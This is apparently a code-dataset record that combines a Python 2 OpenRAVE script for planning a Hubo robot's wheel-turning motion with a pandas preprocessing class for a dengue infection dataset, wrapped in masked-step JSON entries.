print goaljoints
try:
answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj3.txt")
except OSError, e:
# No file cmovetraj
print e
return []
try:
            answer = cbirrtHubo.solve('traj movetraj3.txt')
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
return self.Playback()
if __name__ == "__main__":
planner = HuboPlusWheelTurning()
planner.SetViewer(True)
planner.SetStopKeyStrokes(False)
planner.Run()
planner.KillOpenrave()
|
normal
|
{
"blob_id": "6ad939ab541562efdaacb8b56865e76d1745176a",
"index": 2494,
"step-1": "#!/usr/bin/env python\n# Ben Suay, RAIL\n# May 2013\n# Worcester Polytechnic Institute\n#\n\n# http://openrave.org/docs/latest_stable/command_line_tools/\n# openrave-robot.py /your/path/to/your.robot.xml --info=joints\n# On that page you can find more examples on how to use openrave-robot.py.\n\nfrom openravepy import *\nimport sys\nif not __openravepy_build_doc__:\n from openravepy import *\n from numpy import *\n import numpy\nimport time\nfrom rodrigues import *\nfrom TransformMatrix import *\nfrom str2num import *\nfrom TSR import *\nfrom math import *\nfrom copy import *\nimport os # for file operations\nfrom RaveCBiRRT import *\nfrom base_wheel_turning import *\n\nclass HuboPlusWheelTurning( BaseWheelTurning ):\n\n def __init__(self,\n HuboModelPath = '../../openHubo/huboplus/rlhuboplus.robot.xml',\n WheelModelPath = '../../../drc_common/models/driving_wheel.robot.xml' ):\n\n BaseWheelTurning.__init__( self, HuboModelPath, WheelModelPath )\n\n # Set those variables to show or hide the interface\n # Do it using the member functions\n self.StopAtKeyStrokes = False\n self.ShowUserInterface = False\n self.ViewerStarted = False\n\n\t# Right Hand Joints \n # Open - Closed Values\n self.rhanddofs = range(27,42)\n self.rhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]\n self.rhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]\n\n # Left Hand Joints\n self.lhanddofs = range(42,57)\n self.lhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]\n self.lhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]\n\n def SetRobotConfiguration(self,jointValues):\n print \"SetRobotConfiguration\"\n values = []\n values.append( jointValues['HPY'] ) # 0\n values.append( jointValues['RHY'] ) # 1\n values.append( jointValues['LHY'] ) # 2\n values.append( jointValues['RHR'] ) # 3\n values.append( jointValues['HPY'] ) # 4\n values.append( jointValues['LHR'] ) # 5\n values.append( jointValues['LHP'] ) # 6\n values.append( jointValues['RKP'] ) # 7\n values.append( jointValues['LKP'] ) # 8\n values.append( jointValues['RAP'] ) # 9\n values.append( jointValues['LAP'] ) # 10\n values.append( jointValues['RAR'] ) # 11\n values.append( jointValues['LAR'] ) # 12\n values.append( jointValues['RSP'] ) # 13 \n values.append( jointValues['LSP'] ) # 14 \n values.append( jointValues['RSR'] ) # 15\n values.append( jointValues['LSR'] ) # 16\n values.append( jointValues['RSY'] ) # 17 \n values.append( jointValues['LSY'] ) # 18\n values.append( jointValues['REP'] ) # 19\n values.append( jointValues['LEP'] ) # 20\n values.append( jointValues['RWY'] ) # 21\n values.append( jointValues['LWY'] ) # 22\n values.append( jointValues['RWP'] ) # 23\n values.append( jointValues['LWP'] ) # 24\n values.append( jointValues['HNR'] ) # 25\n values.append( jointValues['HNP'] ) # 26\n\n for i in range(27,57):\n values.append(0)\n\n# values.append( jointValues['rightIndexKnuckle2'] ) # 27\n# values.append( jointValues['rightIndexKnuckle3'] ) # 28\n# values.append( jointValues['rightIndexKnuckle1'] ) # 29\n# values.append( jointValues['rightMiddleKnuckle2'] ) # 30\n# values.append( jointValues['rightMiddleKnuckle3'] ) # 31\n# values.append( jointValues['rightMiddleKnuckle1'] ) # 32\n# values.append( jointValues['rightRingKnuckle2'] ) # 33\n# values.append( jointValues['rightRingKnuckle3'] ) # 34\n# values.append( jointValues['rightRingKnuckle1'] ) # 35\n# values.append( 
jointValues['rightPinkyKnuckle2'] ) # 36\n# values.append( jointValues['rightPinkyKnuckle3'] ) # 37\n# values.append( jointValues['rightPinkyKnuckle1'] ) # 38\n# values.append( jointValues['rightThumbKnuckle2'] ) # 39\n# values.append( jointValues['rightThumbKnuckle3'] ) # 40\n# values.append( jointValues['rightThumbKnuckle1'] ) # 41\n# values.append( jointValues['leftIndexKnuckle2'] ) # 42\n# values.append( jointValues['leftIndexKnuckle3'] ) # 43\n# values.append( jointValues['leftIndexKnuckle1'] ) # 44\n# values.append( jointValues['leftMiddleKnuckle2'] ) # 45\n# values.append( jointValues['leftMiddleKnuckle3'] ) # 46\n# values.append( jointValues['leftMiddleKnuckle1'] ) # 47\n# values.append( jointValues['leftRingKnuckle2'] ) # 48\n# values.append( jointValues['leftRingKnuckle3'] ) # 49\n# values.append( jointValues['leftRingKnuckle1'] ) # 50\n# values.append( jointValues['leftPinkyKnuckle2'] ) # 51\n# values.append( jointValues['leftPinkyKnuckle3'] ) # 52\n# values.append( jointValues['leftPinkyKnuckle1'] ) # 53\n# values.append( jointValues['leftThumbKnuckle2'] ) # 54\n# values.append( jointValues['leftThumbKnuckle3'] ) # 55\n# values.append( jointValues['leftThumbKnuckle1'] ) # 56\n self.robotid.SetDOFValues( values )\n \n def Run(self):\n \n self.RemoveFiles()\n\n # This is a list of handles of the objects that are\n # drawn on the screen in OpenRAVE Qt-Viewer.\n # Keep appending to the end, and pop() if you want to delete.\n handles = [] \n\n normalsmoothingitrs = 150;\n fastsmoothingitrs = 20;\n\n self.StartViewerAndSetWheelPos( handles )\n\n # Wheel Joint Index \n crankjointind = 0\n # Set the wheel joints back to 0 for replanning\n self.crankid.SetDOFValues([0],[crankjointind])\n self.crankid.GetController().Reset(0)\n\n manips = self.robotid.GetManipulators()\n crankmanip = self.crankid.GetManipulators()\n \n try:\n cbirrtHubo = RaveCBiRRT(self.env,'rlhuboplus')\n cbirrtWheel = RaveCBiRRT(self.env,'crank')\n except openrave_exception, e:\n print e\n return []\n\n # Keep Active Joint Indices\n # Note that 0 is the driving wheel\n #activedofs = [0]\n activedofs = []\n for m in manips:\n # print m.GetArmIndices()\n activedofs.extend(m.GetArmIndices())\n\n # Sort Active Joint Indices\n activedofs.sort()\n #print activedofs\n\n # Set Elbows and Thumbs Joint Values\n self.robotid.SetDOFValues([-0.95,-0.95,1,1],[19,20,41,56]) \n self.robotid.SetActiveDOFs(activedofs)\n\n # Current configuration of the robot is its initial configuration\n initconfig = self.robotid.GetActiveDOFValues()\n\n print \"robot init config : \"\n print initconfig\n\n # List of Robot Links\n links = self.robotid.GetLinks()\n \n # List of Wheel (Crank Links)\n cranklinks = self.crankid.GetLinks()\n \n # End Effector Transforms\n Tee = []\n for i in range(len(manips)):\n # Returns End Effector Transform in World Coordinates\n Tlink = manips[i].GetEndEffectorTransform()\n Tee.append(Tlink)\n\n \n # Get Transformation Matrix for the Wheel\n # Note that crank's links are not rotated\n # If you want use the wheel's end effector's transformation\n # matrix (which is 23 degrees tilted) then see\n # CTee matrix below.\n #\n # crank has two links: \n # 0) pole - the blue cylinder in the model, and, \n # 1) crank - the driving wheel itself.\n jointtm = cranklinks[0].GetTransform()\n # handles.append(misc.DrawAxes(env,matrix(jointtm),1))\n \n\n # We can also get the transformation matrix\n # with the following command as a string\n jointtm_str = cbirrtHubo.solve('GetJointTransform name crank jointind '+str(crankjointind))\n 
# And then we can convert the string to a 1x12 array\n jointtm_str = jointtm_str.replace(\" \",\",\")\n jointtm_num = eval('['+jointtm_str+']')\n\n # In this script we will use jointtm.\n # jointtm_str and jointtm_num are given as example.\n \n # Crank Transform End Effector in World Coordinates\n # This is the transformation matrix of the end effector \n # named \"dummy\" in the xml file.\n # Note that dummy is tilted 23 degress around its X-Axis\n CTee = crankmanip[0].GetEndEffectorTransform()\n\n tilt_angle_deg = acos(dot(linalg.inv(CTee),jointtm)[1,1])*180/pi\n tilt_angle_rad = acos(dot(linalg.inv(CTee),jointtm)[1,1]) \n\n # Center of Gravity Target\n cogtarg = [-0.05, 0.085, 0]\n #if self.ShowUserInterface :\n #cogtm = MakeTransform(rodrigues([0,0,0]),transpose(matrix(cogtarg)))\n #handles.append(misc.DrawAxes(self.env,cogtm,1))\n\n # polyscale: changes the scale of the support polygon\n # polytrans: shifts the support polygon around\n footlinknames = ' Body_RAR Body_LAR polyscale 0.5 0.5 0 polytrans -0.015 0 0 '\n #footlinknames = ' Body_RAR Body_LAR polyscale 0.7 0.5 0 polytrans -0.015 0 0 '\n #footlinknames = ' Body_RAR Body_LAR polyscale 1.0 1.0 0 polytrans 0 0 0 '\n\n # What is this?\n handrot = rodrigues([0,-pi/2,0])\n \n # Translation Offset from the wheel center for the hands\n transoffset = [0, 0.15, 0];\n \n # Figure out where to put the left hand on the wheel\n temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))\n temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))\n \n # Left Hand Pose in World Coordinates\n T0_LH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,0.15,0]))))\n\n # Uncomment if you want to see where T0_LH1 is \n # handles.append(misc.DrawAxes(env,matrix(T0_LH1),1))\n\n # Figure out where to put the right hand on the wheel\n temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))\n temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))\n # Right Hand Pose in World Coordinates\n T0_RH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,-0.15,0]))))\n \n # Uncomment if you want to see where T0_RH1 is \n # handles.append(misc.DrawAxes(env,matrix(T0_RH1),1))\n \n # Define Task Space Region strings\n # Left Hand\n TSRString1 = SerializeTSR(0,'NULL',T0_LH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n\n # Right Hand\n TSRString2 = SerializeTSR(1,'NULL',T0_RH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n \n # Left Foot\n TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n\n # Head\n # Grasp transform in Head coordinates\n Tw0_eH = eye(4) \n # How much freedom do we want to give to the Head\n # [x,x,y,y,z,z,R,R,P,P,Y,Y]\n Bw0H = matrix([0,0,-0.1,0.1,-0.1,0.01,0,0,0,0,0,0])\n TSRString4 = SerializeTSR(4,'NULL',Tee[4],Tw0_eH,Bw0H)\n\n # We defined Task Space Regions. 
Now let's concatenate them.\n TSRChainStringGrasping = SerializeTSRChain(0,1,0,1,TSRString1,'NULL',[])+' '+SerializeTSRChain(0,1,0,1,TSRString2,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString3,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString4,'NULL',[])\n \n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan initconfig --> startik\"\n sys.stdin.readline()\n \n # Get a trajectory from initial configuration to grasp configuration\n with self.robotid:\n try:\n answer = cbirrtHubo.solve('RunCBiRRT psample 0.2 supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' '+TSRChainStringGrasping)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj0.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n # The following is the same as commented out try-except section\n traj = RaveCreateTrajectory(self.env,'').deserialize(open('movetraj0.txt','r').read()) \n self.robotid.GetController().SetPath(traj) \n self.robotid.WaitForController(0)\n self.robotid.GetController().Reset(0) \n # Reset(0) releases the controller, otherwise after calling \n # SetPath the robot controller actively holds the trajectory's final joint values\n \n # Instead of 4 lines above, we could use the following block\n # to play the trajectory\n #\n # try:\n # answer= cbirrtHubo.solve('traj movetraj0.txt');\n # robotid.WaitForController(0)\n # sys.stdin.readline()\n # # debug\n # print \"traj call answer: \",str(answer)\n # except openrave_exception, e:\n # print e\n \n \n # Get the current configuration of the robot\n # and assign it to startik (start of the wheel\n # rotation path).\n startik = self.robotid.GetActiveDOFValues()\n \n # Left Hand's index is less than the right hand.\n # Hence it is evaluated first by the CBiRRT Module.\n # That's why We need to define the right hand's \n # transform relative to the wheel (ask Dmitry Berenson\n # about this for more information).\n temp1 = MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0])))\n temp2 = MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0])))\n # Rotate the wheel's transform to a suitable pose\n # for the Left Hand\n # T0_w0L stands for: \n # left hand's transform on wheel in world coordinates\n T0_w0L = dot(dot(CTee,temp1),temp2)\n # This is what's happening: \n #\n # Tw0L_0 = linalg.inv(T0_w0L)\n # Tw0L_LH1 = Tw0L_0*T0_LH1\n #\n # Left hand's transform in wheel's coordinates\n Tw0L_LH1 = dot(linalg.inv(T0_w0L),T0_LH1)\n # Transform of the left hand's end effector in wheel's coords.\n # Required by CBiRRT\n Tw0_eL = Tw0L_LH1\n # How much freedom do we want to give to the left hand\n Bw0L = matrix([0,0,0,0,0,0,0,pi,0,0,0,0])\n\n # Right Hand's transforms:\n T0_crankcrank = self.crankid.GetManipulators()[0].GetTransform()\n T0_w0R = MakeTransform(rodrigues([tilt_angle_rad,0,0]),transpose(matrix([0,0,0])))\n # End effector transform in wheel coordinates\n Tw0_eR = dot(linalg.inv(T0_crankcrank),T0_RH1)\n\n #handles.append(misc.DrawAxes(env,matrix(Tw0_eR),1))\n\n # How much freedom? 
(note: in frame of crank)\n Bw0R = matrix([0,0,0,0,0,0,0,0,0,0,0,0])\n\n # Head's transforms:\n T0_w0H = Tee[4]\n Tw0_eH = eye(4);\n Bw0H = matrix([-0.05,0.05,-0.1,0.1,-100,100,-pi,pi,-pi,pi,-pi,pi])\n \n \n # Define Task Space Regions\n # Left Hand\n TSRString1 = SerializeTSR(0,'NULL',T0_w0L,Tw0_eL,Bw0L)\n # Right Hand\n TSRString2 = SerializeTSR(1,'crank crank',T0_w0R,Tw0_eR,Bw0R)\n # Left Foot\n TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n # Head\n TSRString4 = SerializeTSR(4,'NULL',T0_w0H,Tw0_eH,Bw0H)\n \n TSRChainStringFootOnly = SerializeTSRChain(0,0,1,1,TSRString3,'NULL',[])\n\n TSRChainStringFootandHead = TSRChainStringFootOnly+' '+SerializeTSRChain(0,0,1,1,TSRString4,'NULL',[])\n\n TSRChainStringTurning = SerializeTSRChain(0,0,1,1,TSRString1,'crank',matrix([crankjointind]))+' '+SerializeTSRChain(0,0,1,1,TSRString2,'NULL',[])+' '+TSRChainStringFootandHead\n \n # Calculate hand transforms after rotating the wheel (they will help us find the goalik):\n # How much do we want to rotate the wheel?\n crank_rot = pi/6.5\n \n # Which joint do we want the CBiRRT to mimic the TSR for?\n TSRChainMimicDOF = 1\n \n # Create the transform for the wheel that we would like to reach to\n Tcrank_rot = MakeTransform(rodrigues([crank_rot,0,0]),transpose(matrix([0,0,0])))\n \n # What is this?\n temp = MakeTransform(rodrigues([0,0,crank_rot]),transpose(matrix([0,0,0])))\n \n # Rotate the left hand's transform on the wheel in world transform \"crank_rot\" radians around it's Z-Axis\n T0_cranknew = dot(T0_w0L,Tcrank_rot)\n \n # Where will the left hand go after turning the wheel?\n # This is what's happening:\n #\n # Tcranknew_LH2 = dot(Tw0L_0,T0_LH1) --> Left hand in wheel's coordinate\n # T0_LH2 = dot(T0_cranknew,Tcranknew_LH2) --> Left hand rotated around wheel's origin\n T0_LH2 = dot(T0_cranknew,dot(linalg.inv(T0_w0L),T0_LH1))\n\n # Uncomment to see T0_LH2\n # handles.append(misc.DrawAxes(env,matrix(T0_LH2),1))\n \n # Where will the right hand go after turning the wheel?\n T0_RH2 = dot(T0_crankcrank,dot(temp,dot(linalg.inv(T0_crankcrank),T0_RH1)))\n\n # Uncomment to see T0_RH2\n # handles.append(misc.DrawAxes(env,matrix(T0_RH2),1))\n\n arg1 = str(cogtarg).strip(\"[]\").replace(', ',' ')\n arg2 = trans_to_str(T0_LH2)\n arg3 = trans_to_str(T0_RH2)\n arg4 = trans_to_str(Tee[2])\n\n # print arg1\n # print arg2\n # print arg3\n # print arg4\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to find a goalIK\"\n sys.stdin.readline()\n\n self.crankid.SetDOFValues([crank_rot],[crankjointind])\n\n goalik = cbirrtHubo.solve('DoGeneralIK exec supportlinks 2 '+footlinknames+' movecog '+arg1+' nummanips 3 maniptm 0 '+arg2+' maniptm 1 '+arg3+' maniptm 2 '+arg4)\n \n # print \"goalIK\"\n # print goalik\n\n self.robotid.SetActiveDOFValues(str2num(goalik))\n self.crankid.SetDOFValues([crank_rot],[crankjointind])\n \n if( self.StopAtKeyStrokes ):\n print \"Press Enter to go to startik\"\n sys.stdin.readline()\n\n # Get a trajectory from goalik to grasp configuration\n goaljoints = deepcopy(goalik)\n for i in range(TSRChainMimicDOF):\n goaljoints += ' 0'\n\n goaljoints = str2num(goaljoints)\n\n self.robotid.SetActiveDOFValues(startik)\n time.sleep(0.5)\n self.robotid.SetDOFValues(self.rhandclosevals,self.rhanddofs)\n self.robotid.SetDOFValues(self.lhandclosevals,self.lhanddofs)\n # Close hands to start \"turning\" the wheel\n self.crankid.SetDOFValues([0],[crankjointind])\n time.sleep(0.5)\n \n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan startik --> goalik 
(DMITRY!!!)\"\n sys.stdin.readline()\n\n print self.robotid.GetActiveDOFValues()\n print TSRChainStringTurning\n\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(fastsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringTurning)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n \n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj1.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n # The following is the same as commented out try-except section\n # traj = RaveCreateTrajectory(env,'').deserialize(open('movetraj1.txt','r').read()) \n # robotid.GetController().SetPath(traj) \n # crankid.GetController().SetPath(traj)\n # robotid.WaitForController(0)\n # crankid.WaitForController(0)\n # robotid.GetController().Reset(0)\n # crankid.GetController().Reset(0)\n \n try:\n answer= cbirrtHubo.solve('traj movetraj1.txt');\n answer= cbirrtWheel.solve('traj movetraj1.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n\n self.robotid.GetController().Reset(0)\n self.robotid.SetDOFValues(self.rhandopenvals,self.rhanddofs)\n self.robotid.SetDOFValues(self.lhandopenvals,self.lhanddofs)\n self.robotid.SetActiveDOFValues(str2num(goalik))\n\n time.sleep(2)\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan goalik --> startik \"\n sys.stdin.readline()\n\n \n\n goaljoints = startik\n\n print self.robotid.GetActiveDOFValues()\n print TSRChainStringFootandHead\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj2.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n try:\n answer= cbirrtHubo.solve('traj movetraj2.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n \n self.robotid.GetController().Reset(0)\n #self.robotid.SetDOFValues(rhandclosevals,rhanddofs)\n #self.robotid.SetDOFValues(lhandclosevals,lhanddofs)\n\n self.robotid.SetActiveDOFValues(startik)\n time.sleep(1)\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan startik --> initconfig \"\n sys.stdin.readline()\n\n goaljoints = initconfig\n print goaljoints\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj3.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n try:\n answer= cbirrtHubo.solve('traj movetraj3.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n\n self.robotid.GetController().Reset(0)\n \n return self.Playback()\n\n\nif __name__ == 
\"__main__\":\n planner = HuboPlusWheelTurning()\n planner.SetViewer(True)\n planner.SetStopKeyStrokes(False)\n planner.Run()\n planner.KillOpenrave()\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright (c) 2021, Omid Erfanmanesh, All rights reserved.
import math
import numpy as np
import pandas as pd
from data.based.based_dataset import BasedDataset
from data.based.file_types import FileTypes
class DengueInfection(BasedDataset):
def __init__(self, cfg, development):
super(DengueInfection, self).__init__(cfg=cfg, dataset_type=FileTypes.TSV, development=development)
if development:
self.total_cases()
self.extract_month()
self.extract_quarter()
self.week_start_date()
# self.six_month()
# self.week_split()
self.city()
            self.cyclic_encoder(col='weekofyear', max_val=53)
self.cyclic_encoder(col='month', max_val=12)
self.persiann_precip_mm()
self.ncep_avg_temp_k()
self.ncep_diur_temp_rng_k()
self.ncep_max_air_temp_k()
self.ncep_min_air_temp_k()
self.ncep_air_temp_k()
self.ncep_dew_point_temp_k()
self.avg_temp_c()
self.diur_temp_rng_c()
self.max_temp_c()
self.min_temp_c()
self.precip_mm()
def cyclic_encoder(self, col, max_val):
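        # Map a cyclic feature onto the unit circle with sin/cos so that, e.g., week 53 and
        # week 1 end up close together instead of numerically far apart.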
self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)
self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)
return self.df
def fill_nan(self, col):
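        # Impute missing values with the mean of the matching (year, month, city) cell of a
        # pivot table; if that cell is empty, fall back to the mean of the whole year.
        # The imputed values are stored in a new '<col>_no_nans' column.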
table = pd.pivot_table(self.df, values=col, index=['year', 'month'],
columns=['city'], aggfunc=np.mean)
self.df[col + '_no_nans'] = self.df[col]
for index, row in self.df.iterrows():
if math.isnan(row[col]):
query = table.query(f'year == "{row["year"]}" & month =="{row["month"]}"').reset_index()
city = row['city']
value = query[city]
if value.empty:
value = self.df.loc[self.df['year'] == row["year"]][col].mean()
self.df.loc[index, [col + '_no_nans']] = value
continue
self.df.loc[index, [col + '_no_nans']] = value[0]
def extract_month(self):
self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])
self.df['month'] = self.df['week_start_date'].dt.month
def extract_quarter(self):
self.df['quarter'] = self.df['week_start_date'].dt.quarter
def week_split(self):
self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if x < 25 else 1)
    def season_of_date(self, date):
year = str(date.year)
seasons = {'spring': pd.date_range(start='21/03/' + year, end='20/06/' + year),
'summer': pd.date_range(start='21/06/' + year, end='22/09/' + year),
'autumn': pd.date_range(start='23/09/' + year, end='20/12/' + year)}
if date in seasons['spring']:
return 'spring'
if date in seasons['summer']:
return 'summer'
if date in seasons['autumn']:
return 'autumn'
else:
return 'winter'
def kelvin_to_celsius(self, kelvin):
if kelvin is None:
return kelvin
return kelvin - 273.15
def year(self):
pass
def week_of_year(self):
pass
def week_start_date(self):
pass
def six_month(self):
self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)
def persiann_precip_mm(self):
self.fill_nan(col='PERSIANN_precip_mm')
def ncep_air_temp_k(self):
self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_air_temp_c')
def ncep_avg_temp_k(self):
self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_avg_temp_c')
def ncep_dew_point_temp_k(self):
"""
dew point temperature in Kelvin degrees measured by NCEP CFSR;
:rtype: object
"""
self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_dew_point_temp_c')
def ncep_max_air_temp_k(self):
self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_max_air_temp_c')
def ncep_min_air_temp_k(self):
self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_min_air_temp_c')
def ncep_precip_kg_per_m2(self):
self.fill_nan(col='NCEP_precip_kg_per_m2')
def ncep_humidity_percent(self):
self.fill_nan(col='NCEP_humidity_percent')
def ncep_precip_mm(self):
self.fill_nan(col='NCEP_precip_mm')
def ncep_humidity_g_per_kg(self):
self.fill_nan(col='NCEP_humidity_g_per_kg')
def ncep_diur_temp_rng_k(self):
self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_diur_temp_rng_c')
def avg_temp_c(self):
self.fill_nan(col='avg_temp_c')
def diur_temp_rng_c(self):
self.fill_nan(col='diur_temp_rng_c')
def max_temp_c(self):
self.fill_nan(col='max_temp_c')
def min_temp_c(self):
self.fill_nan(col='min_temp_c')
def precip_mm(self):
self.fill_nan(col='precip_mm')
def total_cases(self):
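        # Keep only rows with fewer than 41 total cases; presumably an outlier cutoff chosen
        # during development.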
self.df = self.df[self.df['total_cases'] < 41]
def city(self):
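        # Drop the 'sj' city rows, keeping only the other city in the dataset.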
self.df = self.df[self.df['city'] != 'sj']
|
normal
|
{
"blob_id": "93ac8a1f795f7809a3e88b56ce90bf1d31706554",
"index": 1139,
"step-1": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n <mask token>\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n <mask token>\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n <mask token>\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n <mask token>\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def 